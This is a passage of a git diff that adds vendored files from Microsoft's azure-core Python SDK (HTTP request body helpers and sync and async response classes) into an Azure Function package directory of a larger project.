"text/plain" + if body: + headers["Content-Length"] = str(len(body)) + return headers, body + if any(hasattr(content, attr) for attr in ["read", "__iter__", "__aiter__"]): + return headers, content + raise TypeError( + "Unexpected type for 'content': '{}'. ".format(type(content)) + + "We expect 'content' to either be str, bytes, an open file-like object or an iterable/asynciterable." + ) + +def set_json_body(json): + # type: (Any) -> Tuple[Dict[str, str], Any] + headers = {"Content-Type": "application/json"} + if hasattr(json, "read"): + content_headers, body = set_content_body(json) + headers.update(content_headers) + else: + body = dumps(json, cls=AzureJSONEncoder) + headers.update({"Content-Length": str(len(body))}) + return headers, body + +def lookup_encoding(encoding): + # type: (str) -> bool + # including check for whether encoding is known taken from httpx + try: + codecs.lookup(encoding) + return True + except LookupError: + return False + +def get_charset_encoding(response): + # type: (...)
-> Optional[str] + content_type = response.headers.get("Content-Type") + + if not content_type: + return None + _, params = cgi.parse_header(content_type) + encoding = params.get('charset') # -> utf-8 + if encoding is None or not lookup_encoding(encoding): + return None + return encoding + +def decode_to_text(encoding, content): + # type: (Optional[str], bytes) -> str + if not content: + return "" + if encoding == "utf-8": + encoding = "utf-8-sig" + if encoding: + return content.decode(encoding) + return codecs.getincrementaldecoder("utf-8-sig")(errors="replace").decode(content) + +class HttpRequestBackcompatMixin(object): + + def __getattr__(self, attr): + backcompat_attrs = [ + "files", + "data", + "multipart_mixed_info", + "query", + "body", + "format_parameters", + "set_streamed_data_body", + "set_text_body", + "set_xml_body", + "set_json_body", + "set_formdata_body", + "set_bytes_body", + "set_multipart_mixed", + "prepare_multipart_body", + "serialize", + ] + attr = _pad_attr_name(attr, backcompat_attrs) + return self.__getattribute__(attr) + + def __setattr__(self, attr, value): + backcompat_attrs = [ + "multipart_mixed_info", + "files", + "data", + "body", + ] + attr = _pad_attr_name(attr, backcompat_attrs) + super(HttpRequestBackcompatMixin, self).__setattr__(attr, value) + + @property + def _multipart_mixed_info(self): + """DEPRECATED: Information used to make multipart mixed requests. + This is deprecated and will be removed in a later release. + """ + try: + return self._multipart_mixed_info_val + except AttributeError: + return None + + @_multipart_mixed_info.setter + def _multipart_mixed_info(self, val): + """DEPRECATED: Set information to make multipart mixed requests. + This is deprecated and will be removed in a later release. + """ + self._multipart_mixed_info_val = val + + @property + def _query(self): + """DEPRECATED: Query parameters passed in by user + This is deprecated and will be removed in a later release. + """ + query = urlparse(self.url).query + if query: + return {p[0]: p[-1] for p in [p.partition("=") for p in query.split("&")]} + return {} + + @property + def _body(self): + """DEPRECATED: Body of the request. You should use the `content` property instead + This is deprecated and will be removed in a later release. + """ + return self._data + + @_body.setter + def _body(self, val): + """DEPRECATED: Set the body of the request + This is deprecated and will be removed in a later release. + """ + self._data = val + + def _format_parameters(self, params): + """DEPRECATED: Format the query parameters + This is deprecated and will be removed in a later release. + You should pass the query parameters through the kwarg `params` + instead. + """ + return _format_parameters_helper(self, params) + + def _set_streamed_data_body(self, data): + """DEPRECATED: Set the streamed request body. + This is deprecated and will be removed in a later release. + You should pass your stream content through the `content` kwarg instead + """ + if not isinstance(data, binary_type) and not any( + hasattr(data, attr) for attr in ["read", "__iter__", "__aiter__"] + ): + raise TypeError( + "A streamable data source must be an open file-like object or iterable." + ) + headers = self._set_body(content=data) + self._files = None + self.headers.update(headers) + + def _set_text_body(self, data): + """DEPRECATED: Set the text body + This is deprecated and will be removed in a later release. 
+ You should pass your text content through the `content` kwarg instead + """ + headers = self._set_body(content=data) + self.headers.update(headers) + self._files = None + + def _set_xml_body(self, data): + """DEPRECATED: Set the xml body. + This is deprecated and will be removed in a later release. + You should pass your xml content through the `content` kwarg instead + """ + headers = self._set_body(content=data) + self.headers.update(headers) + self._files = None + + def _set_json_body(self, data): + """DEPRECATED: Set the json request body. + This is deprecated and will be removed in a later release. + You should pass your json content through the `json` kwarg instead + """ + headers = self._set_body(json=data) + self.headers.update(headers) + self._files = None + + def _set_formdata_body(self, data=None): + """DEPRECATED: Set the formrequest body. + This is deprecated and will be removed in a later release. + You should pass your stream content through the `files` kwarg instead + """ + if data is None: + data = {} + content_type = self.headers.pop("Content-Type", None) if self.headers else None + + if content_type and content_type.lower() == "application/x-www-form-urlencoded": + headers = self._set_body(data=data) + self._files = None + else: # Assume "multipart/form-data" + headers = self._set_body(files=data) + self._data = None + self.headers.update(headers) + + def _set_bytes_body(self, data): + """DEPRECATED: Set the bytes request body. + This is deprecated and will be removed in a later release. + You should pass your bytes content through the `content` kwarg instead + """ + headers = self._set_body(content=data) + # we don't want default Content-Type + # in 2.7, byte strings are still strings, so they get set with text/plain content type + + headers.pop("Content-Type", None) + self.headers.update(headers) + self._files = None + + def _set_multipart_mixed(self, *requests, **kwargs): + """DEPRECATED: Set the multipart mixed info. + This is deprecated and will be removed in a later release. + """ + self.multipart_mixed_info = ( + requests, + kwargs.pop("policies", []), + kwargs.pop("boundary", None), + kwargs + ) + + def _prepare_multipart_body(self, content_index=0): + """DEPRECATED: Prepare your request body for multipart requests. + This is deprecated and will be removed in a later release. + """ + return _prepare_multipart_body_helper(self, content_index) + + def _serialize(self): + """DEPRECATED: Serialize this request using application/http spec. + This is deprecated and will be removed in a later release. + :rtype: bytes + """ + return _serialize_request(self) + + def _add_backcompat_properties(self, request, memo): + """While deepcopying, we also need to add the private backcompat attrs""" + request._multipart_mixed_info = copy.deepcopy(self._multipart_mixed_info, memo) # pylint: disable=protected-access diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_http_response_impl.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_http_response_impl.py new file mode 100644 index 0000000..50fcd95 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_http_response_impl.py @@ -0,0 +1,465 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
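# ---------------------------------------------------------------------------
# Editor's note (illustrative sketch, not part of the vendored diff): the
# backcompat mixins in this file route deprecated public attributes such as
# "body" or "files" to private underscored implementations via
# _pad_attr_name. A stripped-down model of that pattern (class and attribute
# names here are hypothetical):
class _BackcompatExample:
    _DEPRECATED = frozenset({"body", "files"})

    def __getattr__(self, attr):
        # Only invoked when normal lookup fails, i.e. for the old names.
        if attr in self._DEPRECATED:
            return self.__getattribute__("_" + attr)
        raise AttributeError(attr)

req = _BackcompatExample()
req._body = b"payload"
assert req.body == b"payload"  # deprecated name still resolves
# ---------------------------------------------------------------------------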
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from json import loads +from typing import cast, TYPE_CHECKING +from six.moves.http_client import HTTPResponse as _HTTPResponse +from ._helpers import ( + get_charset_encoding, + decode_to_text, +) +from ..exceptions import HttpResponseError, ResponseNotReadError, StreamConsumedError, StreamClosedError +try: + from ._rest_py3 import ( + _HttpResponseBase, + HttpResponse as _HttpResponse, + HttpRequest as _HttpRequest + ) +except (SyntaxError, ImportError): + from ._rest import ( # type: ignore + _HttpResponseBase, + HttpResponse as _HttpResponse, + HttpRequest as _HttpRequest + ) +from ..utils._utils import case_insensitive_dict +from ..utils._pipeline_transport_rest_shared import ( + _pad_attr_name, + BytesIOSocket, + _decode_parts_helper, + _get_raw_parts_helper, + _parts_helper, +) + +if TYPE_CHECKING: + from typing import Any, Optional, Iterator, MutableMapping, Callable + +class _HttpResponseBackcompatMixinBase(object): + """Base Backcompat mixin for responses. + + This mixin is used by both sync and async HttpResponse + backcompat mixins. + """ + + def __getattr__(self, attr): + backcompat_attrs = [ + "body", + "internal_response", + "block_size", + "stream_download", + ] + attr = _pad_attr_name(attr, backcompat_attrs) + return self.__getattribute__(attr) + + def __setattr__(self, attr, value): + backcompat_attrs = [ + "block_size", + "internal_response", + "request", + "status_code", + "headers", + "reason", + "content_type", + "stream_download", + ] + attr = _pad_attr_name(attr, backcompat_attrs) + super(_HttpResponseBackcompatMixinBase, self).__setattr__(attr, value) + + def _body(self): + """DEPRECATED: Get the response body. + This is deprecated and will be removed in a later release. + You should get it through the `content` property instead + """ + self.read() + return self.content # pylint: disable=no-member + + def _decode_parts(self, message, http_response_type, requests): + """Helper for _decode_parts. + + Rebuild an HTTP response from pure string. 
+ """ + def _deserialize_response( + http_response_as_bytes, http_request, http_response_type + ): + local_socket = BytesIOSocket(http_response_as_bytes) + response = _HTTPResponse(local_socket, method=http_request.method) + response.begin() + return http_response_type(request=http_request, internal_response=response) + + return _decode_parts_helper( + self, + message, + http_response_type or RestHttpClientTransportResponse, + requests, + _deserialize_response + ) + + def _get_raw_parts(self, http_response_type=None): + """Helper for get_raw_parts + + Assuming this body is multipart, return the iterator or parts. + + If parts are application/http use http_response_type or HttpClientTransportResponse + as enveloppe. + """ + return _get_raw_parts_helper( + self, http_response_type or RestHttpClientTransportResponse + ) + + def _stream_download(self, pipeline, **kwargs): + """DEPRECATED: Generator for streaming request body data. + This is deprecated and will be removed in a later release. + You should use `iter_bytes` or `iter_raw` instead. + :rtype: iterator[bytes] + """ + return self._stream_download_generator(pipeline, self, **kwargs) + +class HttpResponseBackcompatMixin(_HttpResponseBackcompatMixinBase): + """Backcompat mixin for sync HttpResponses""" + + def __getattr__(self, attr): + backcompat_attrs = ["parts"] + attr = _pad_attr_name(attr, backcompat_attrs) + return super(HttpResponseBackcompatMixin, self).__getattr__(attr) + + def parts(self): + """DEPRECATED: Assuming the content-type is multipart/mixed, will return the parts as an async iterator. + This is deprecated and will be removed in a later release. + :rtype: Iterator + :raises ValueError: If the content is not multipart/mixed + """ + return _parts_helper(self) + + +class _HttpResponseBaseImpl(_HttpResponseBase, _HttpResponseBackcompatMixinBase): # pylint: disable=too-many-instance-attributes + """Base Implementation class for azure.core.rest.HttpRespone and azure.core.rest.AsyncHttpResponse + + Since the rest responses are abstract base classes, we need to implement them for each of our transport + responses. This is the base implementation class shared by HttpResponseImpl and AsyncHttpResponseImpl. + The transport responses will be built on top of HttpResponseImpl and AsyncHttpResponseImpl + + :keyword request: The request that led to the response + :type request: ~azure.core.rest.HttpRequest + :keyword any internal_response: The response we get directly from the transport. For example, for our requests + transport, this will be a requests.Response. + :keyword optional[int] block_size: The block size we are using in our transport + :keyword int status_code: The status code of the response + :keyword str reason: The HTTP reason + :keyword str content_type: The content type of the response + :keyword MutableMapping[str, str] headers: The response headers + :keyword Callable stream_download_generator: The stream download generator that we use to stream the response. 
+ """ + + def __init__(self, **kwargs): + # type: (Any) -> None + super(_HttpResponseBaseImpl, self).__init__() + self._request = kwargs.pop("request") + self._internal_response = kwargs.pop("internal_response") + self._block_size = kwargs.pop("block_size", None) or 4096 # type: int + self._status_code = kwargs.pop("status_code") # type: int + self._reason = kwargs.pop("reason") # type: str + self._content_type = kwargs.pop("content_type") # type: str + self._headers = kwargs.pop("headers") # type: MutableMapping[str, str] + self._stream_download_generator = kwargs.pop("stream_download_generator") # type: Callable + self._is_closed = False + self._is_stream_consumed = False + self._json = None # this is filled in ContentDecodePolicy, when we deserialize + self._content = None # type: Optional[bytes] + self._text = None # type: Optional[str] + + @property + def request(self): + # type: (...) -> _HttpRequest + """The request that resulted in this response. + + :rtype: ~azure.core.rest.HttpRequest + """ + return self._request + + @property + def url(self): + # type: (...) -> str + """The URL that resulted in this response. + + :rtype: str + """ + return self.request.url + + @property + def is_closed(self): + # type: (...) -> bool + """Whether the network connection has been closed yet. + + :rtype: bool + """ + return self._is_closed + + @property + def is_stream_consumed(self): + # type: (...) -> bool + """Whether the stream has been consumed""" + return self._is_stream_consumed + + @property + def status_code(self): + # type: (...) -> int + """The status code of this response. + + :rtype: int + """ + return self._status_code + + @property + def headers(self): + # type: (...) -> MutableMapping[str, str] + """The response headers. + + :rtype: MutableMapping[str, str] + """ + return self._headers + + @property + def content_type(self): + # type: (...) -> Optional[str] + """The content type of the response. + + :rtype: optional[str] + """ + return self._content_type + + @property + def reason(self): + # type: (...) -> str + """The reason phrase for this response. + + :rtype: str + """ + return self._reason + + @property + def encoding(self): + # type: (...) -> Optional[str] + """Returns the response encoding. + + :return: The response encoding. We either return the encoding set by the user, + or try extracting the encoding from the response's content type. If all fails, + we return `None`. + :rtype: optional[str] + """ + try: + return self._encoding + except AttributeError: + self._encoding = get_charset_encoding(self) # type: Optional[str] + return self._encoding + + @encoding.setter + def encoding(self, value): + # type: (str) -> None + """Sets the response encoding""" + self._encoding = value + self._text = None # clear text cache + self._json = None # clear json cache as well + + def text(self, encoding=None): + # type: (Optional[str]) -> str + """Returns the response body as a string + + :param optional[str] encoding: The encoding you want to decode the text with. Can + also be set independently through our encoding property + :return: The response's content decoded as a string. + """ + if encoding: + return decode_to_text(encoding, self.content) + if self._text: + return self._text + self._text = decode_to_text(self.encoding, self.content) + return self._text + + def json(self): + # type: (...) -> Any + """Returns the whole body as a json object. 
+ + :return: The JSON deserialized response body + :rtype: any + :raises json.decoder.JSONDecodeError or ValueError (in python 2.7) if object is not JSON decodable: + """ + # this will trigger errors if response is not read in + self.content # pylint: disable=pointless-statement + if not self._json: + self._json = loads(self.text()) + return self._json + + def _stream_download_check(self): + if self.is_stream_consumed: + raise StreamConsumedError(self) + if self.is_closed: + raise StreamClosedError(self) + + self._is_stream_consumed = True + + def raise_for_status(self): + # type: (...) -> None + """Raises an HttpResponseError if the response has an error status code. + + If response is good, does nothing. + """ + if cast(int, self.status_code) >= 400: + raise HttpResponseError(response=self) + + @property + def content(self): + # type: (...) -> bytes + """Return the response's content in bytes.""" + if self._content is None: + raise ResponseNotReadError(self) + return self._content + + def __repr__(self): + # type: (...) -> str + content_type_str = ( + ", Content-Type: {}".format(self.content_type) if self.content_type else "" + ) + return "<HttpResponse: {} {}{}>".format( + self.status_code, self.reason, content_type_str + ) + +class HttpResponseImpl(_HttpResponseBaseImpl, _HttpResponse, HttpResponseBackcompatMixin): + """HttpResponseImpl built on top of our HttpResponse protocol class. + + Since ~azure.core.rest.HttpResponse is an abstract base class, we need to + implement HttpResponse for each of our transports. This is an implementation + that each of the sync transport responses can be built on. + + :keyword request: The request that led to the response + :type request: ~azure.core.rest.HttpRequest + :keyword any internal_response: The response we get directly from the transport. For example, for our requests + transport, this will be a requests.Response. + :keyword optional[int] block_size: The block size we are using in our transport + :keyword int status_code: The status code of the response + :keyword str reason: The HTTP reason + :keyword str content_type: The content type of the response + :keyword MutableMapping[str, str] headers: The response headers + :keyword Callable stream_download_generator: The stream download generator that we use to stream the response. + """ + + def __enter__(self): + # type: (...) -> HttpResponseImpl + return self + + def close(self): + # type: (...) -> None + if not self.is_closed: + self._is_closed = True + self._internal_response.close() + + def __exit__(self, *args): + # type: (...) -> None + self.close() + + def _set_read_checks(self): + self._is_stream_consumed = True + self.close() + + def read(self): + # type: (...) -> bytes + """ + Read the response's bytes. + + """ + if self._content is None: + self._content = b"".join(self.iter_bytes()) + self._set_read_checks() + return self.content + + def iter_bytes(self, **kwargs): + # type: (Any) -> Iterator[bytes] + """Iterates over the response's bytes. Will decompress in the process. + + :return: An iterator of bytes from the response + :rtype: Iterator[bytes] + """ + if self._content is not None: + chunk_size = cast(int, self._block_size) + for i in range(0, len(self.content), chunk_size): + yield self.content[i : i + chunk_size] + else: + self._stream_download_check() + for part in self._stream_download_generator( + response=self, + pipeline=None, + decompress=True, + ): + yield part + self.close() + + def iter_raw(self, **kwargs): + # type: (Any) -> Iterator[bytes] + """Iterates over the response's bytes.
Will not decompress in the process. + + :return: An iterator of bytes from the response + :rtype: Iterator[str] + """ + self._stream_download_check() + for part in self._stream_download_generator( + response=self, pipeline=None, decompress=False + ): + yield part + self.close() + +class _RestHttpClientTransportResponseBackcompatBaseMixin(_HttpResponseBackcompatMixinBase): + + def body(self): + if self._content is None: + self._content = self.internal_response.read() + return self.content + +class _RestHttpClientTransportResponseBase(_HttpResponseBaseImpl, _RestHttpClientTransportResponseBackcompatBaseMixin): + + def __init__(self, **kwargs): + internal_response = kwargs.pop("internal_response") + headers = case_insensitive_dict(internal_response.getheaders()) + super(_RestHttpClientTransportResponseBase, self).__init__( + internal_response=internal_response, + status_code=internal_response.status, + reason=internal_response.reason, + headers=headers, + content_type=headers.get("Content-Type"), + stream_download_generator=None, + **kwargs + ) + +class RestHttpClientTransportResponse(_RestHttpClientTransportResponseBase, HttpResponseImpl): + """Create a Rest HTTPResponse from an http.client response. + """ + + def iter_bytes(self, **kwargs): + raise TypeError("We do not support iter_bytes for this transport response") + + def iter_raw(self, **kwargs): + raise TypeError("We do not support iter_raw for this transport response") + + def read(self): + if self._content is None: + self._content = self._internal_response.read() + return self._content diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_http_response_impl_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_http_response_impl_async.py new file mode 100644 index 0000000..7bfc568 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_http_response_impl_async.py @@ -0,0 +1,157 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. 
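# ---------------------------------------------------------------------------
# Editor's note (illustrative sketch, not part of the vendored diff): the
# sync responses above enforce a read-before-access contract: .content
# raises ResponseNotReadError until read() has buffered the body once,
# after which the bytes are cached. The contract in isolation (names
# hypothetical, RuntimeError standing in for ResponseNotReadError):
class _CachedBody:
    def __init__(self, fetch):
        self._fetch = fetch        # zero-argument callable returning bytes
        self._content = None

    def read(self):
        if self._content is None:
            self._content = self._fetch()  # hit the transport only once
        return self._content

    @property
    def content(self):
        if self._content is None:
            raise RuntimeError("content is not read; call read() first")
        return self._content
# ---------------------------------------------------------------------------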
+# +# -------------------------------------------------------------------------- +from typing import Any, AsyncIterator +from ._rest_py3 import AsyncHttpResponse as _AsyncHttpResponse +from ._http_response_impl import ( + _HttpResponseBaseImpl, _HttpResponseBackcompatMixinBase, _RestHttpClientTransportResponseBase +) +from ..utils._pipeline_transport_rest_shared import _pad_attr_name +from ..utils._pipeline_transport_rest_shared_async import _PartGenerator + + +class AsyncHttpResponseBackcompatMixin(_HttpResponseBackcompatMixinBase): + """Backcompat mixin for async responses""" + + def __getattr__(self, attr): + backcompat_attrs = ["parts"] + attr = _pad_attr_name(attr, backcompat_attrs) + return super().__getattr__(attr) + + def parts(self): + """DEPRECATED: Assuming the content-type is multipart/mixed, will return the parts as an async iterator. + This is deprecated and will be removed in a later release. + :rtype: AsyncIterator + :raises ValueError: If the content is not multipart/mixed + """ + if not self.content_type or not self.content_type.startswith("multipart/mixed"): + raise ValueError( + "You can't get parts if the response is not multipart/mixed" + ) + + return _PartGenerator(self, default_http_response_type=RestAsyncHttpClientTransportResponse) + +class AsyncHttpResponseImpl(_HttpResponseBaseImpl, _AsyncHttpResponse, AsyncHttpResponseBackcompatMixin): + """AsyncHttpResponseImpl built on top of our HttpResponse protocol class. + + Since ~azure.core.rest.AsyncHttpResponse is an abstract base class, we need to + implement HttpResponse for each of our transports. This is an implementation + that each of the sync transport responses can be built on. + + :keyword request: The request that led to the response + :type request: ~azure.core.rest.HttpRequest + :keyword any internal_response: The response we get directly from the transport. For example, for our requests + transport, this will be a requests.Response. + :keyword optional[int] block_size: The block size we are using in our transport + :keyword int status_code: The status code of the response + :keyword str reason: The HTTP reason + :keyword str content_type: The content type of the response + :keyword MutableMapping[str, str] headers: The response headers + :keyword Callable stream_download_generator: The stream download generator that we use to stream the response. + """ + + async def _set_read_checks(self): + self._is_stream_consumed = True + await self.close() + + async def read(self) -> bytes: + """Read the response's bytes into memory. + + :return: The response's bytes + :rtype: bytes + """ + if self._content is None: + parts = [] + async for part in self.iter_bytes(): + parts.append(part) + self._content = b"".join(parts) + await self._set_read_checks() + return self._content + + async def iter_raw(self, **kwargs: Any) -> AsyncIterator[bytes]: + """Asynchronously iterates over the response's bytes. Will not decompress in the process + :return: An async iterator of bytes from the response + :rtype: AsyncIterator[bytes] + """ + self._stream_download_check() + async for part in self._stream_download_generator( + response=self, pipeline=None, decompress=False + ): + yield part + await self.close() + + async def iter_bytes(self, **kwargs: Any) -> AsyncIterator[bytes]: + """Asynchronously iterates over the response's bytes. 
Will decompress in the process. + :return: An async iterator of bytes from the response + :rtype: AsyncIterator[bytes] + """ + if self._content is not None: + for i in range(0, len(self.content), self._block_size): + yield self.content[i : i + self._block_size] + else: + self._stream_download_check() + async for part in self._stream_download_generator( + response=self, + pipeline=None, + decompress=True + ): + yield part + await self.close() + + async def close(self) -> None: + """Close the response. + + :return: None + :rtype: None + """ + if not self.is_closed: + self._is_closed = True + await self._internal_response.close() + + async def __aexit__(self, *args) -> None: + await self.close() + + def __repr__(self) -> str: + content_type_str = ( + ", Content-Type: {}".format(self.content_type) if self.content_type else "" + ) + return "<AsyncHttpResponse: {} {}{}>".format( + self.status_code, self.reason, content_type_str + ) + +class RestAsyncHttpClientTransportResponse(_RestHttpClientTransportResponseBase, AsyncHttpResponseImpl): + """Create a Rest HTTPResponse from an http.client response. + """ + + async def iter_bytes(self, **kwargs): + raise TypeError("We do not support iter_bytes for this transport response") + + async def iter_raw(self, **kwargs): + raise TypeError("We do not support iter_raw for this transport response") + + async def read(self): + if self._content is None: + self._content = self._internal_response.read() + return self._content diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_asyncio.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_asyncio.py new file mode 100644 index 0000000..661a0ac --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_asyncio.py @@ -0,0 +1,50 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE.
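# ---------------------------------------------------------------------------
# Editor's note (illustrative sketch, not part of the vendored diff): once a
# body is cached, iter_bytes above replays it in block_size chunks instead
# of touching the network again. The chunking loop on its own:
def chunk(content: bytes, block_size: int = 4096):
    """Yield successive block_size slices of already-read content."""
    for i in range(0, len(content), block_size):
        yield content[i : i + block_size]

assert list(chunk(b"abcdef", 4)) == [b"abcd", b"ef"]
# ---------------------------------------------------------------------------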
+# +# -------------------------------------------------------------------------- +import asyncio +from ._http_response_impl_async import AsyncHttpResponseImpl +from ._requests_basic import _RestRequestsTransportResponseBase +from ..pipeline.transport._requests_asyncio import AsyncioStreamDownloadGenerator + +class RestAsyncioRequestsTransportResponse(AsyncHttpResponseImpl, _RestRequestsTransportResponseBase): # type: ignore + """Asynchronous streaming of data from the response. + """ + + def __init__(self, **kwargs): + super().__init__( + stream_download_generator=AsyncioStreamDownloadGenerator, + **kwargs + ) + + async def close(self) -> None: + """Close the response. + + :return: None + :rtype: None + """ + if not self.is_closed: + self._is_closed = True + self._internal_response.close() + await asyncio.sleep(0) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_basic.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_basic.py new file mode 100644 index 0000000..7ee6629 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_basic.py @@ -0,0 +1,98 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +try: + import collections.abc as collections +except ImportError: + import collections # type: ignore + +from requests.structures import CaseInsensitiveDict + +from ._http_response_impl import _HttpResponseBaseImpl, HttpResponseImpl, _HttpResponseBackcompatMixinBase +from ..pipeline.transport._requests_basic import StreamDownloadGenerator + +class _ItemsView(collections.ItemsView): + + def __contains__(self, item): + if not (isinstance(item, (list, tuple)) and len(item) == 2): + return False # requests raises here, we just return False + for k, v in self.__iter__(): + if item[0].lower() == k.lower() and item[1] == v: + return True + return False + + def __repr__(self): + return 'ItemsView({})'.format(dict(self.__iter__())) + +class _CaseInsensitiveDict(CaseInsensitiveDict): + """Overriding default requests dict so we can unify + to not raise if users pass in incorrect items to contains. 
+ Instead, we return False + """ + + def items(self): + """Return a new view of the dictionary's items.""" + return _ItemsView(self) + +class _RestRequestsTransportResponseBaseMixin(_HttpResponseBackcompatMixinBase): + """Backcompat mixin for the sync and async requests responses + + Overriding the default mixin behavior here because we need to synchronously + read the response's content for the async requests responses + """ + + def _body(self): + # Since requests is not an async library, for backcompat, users should + # be able to access the body directly without loading it first (like we have to do + # in aiohttp). So here, we set self._content to self._internal_response.content, + # which is similar to read, without the async call. + if self._content is None: + self._content = self._internal_response.content + return self._content + +class _RestRequestsTransportResponseBase(_HttpResponseBaseImpl, _RestRequestsTransportResponseBaseMixin): + def __init__(self, **kwargs): + internal_response = kwargs.pop("internal_response") + content = None + if internal_response._content_consumed: + content = internal_response.content + headers = _CaseInsensitiveDict(internal_response.headers) + super(_RestRequestsTransportResponseBase, self).__init__( + internal_response=internal_response, + status_code=internal_response.status_code, + headers=headers, + reason=internal_response.reason, + content_type=headers.get('content-type'), + content=content, + **kwargs + ) + +class RestRequestsTransportResponse(HttpResponseImpl, _RestRequestsTransportResponseBase): + + def __init__(self, **kwargs): + super(RestRequestsTransportResponse, self).__init__( + stream_download_generator=StreamDownloadGenerator, + **kwargs + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_trio.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_trio.py new file mode 100644 index 0000000..41b21a6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_trio.py @@ -0,0 +1,45 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a 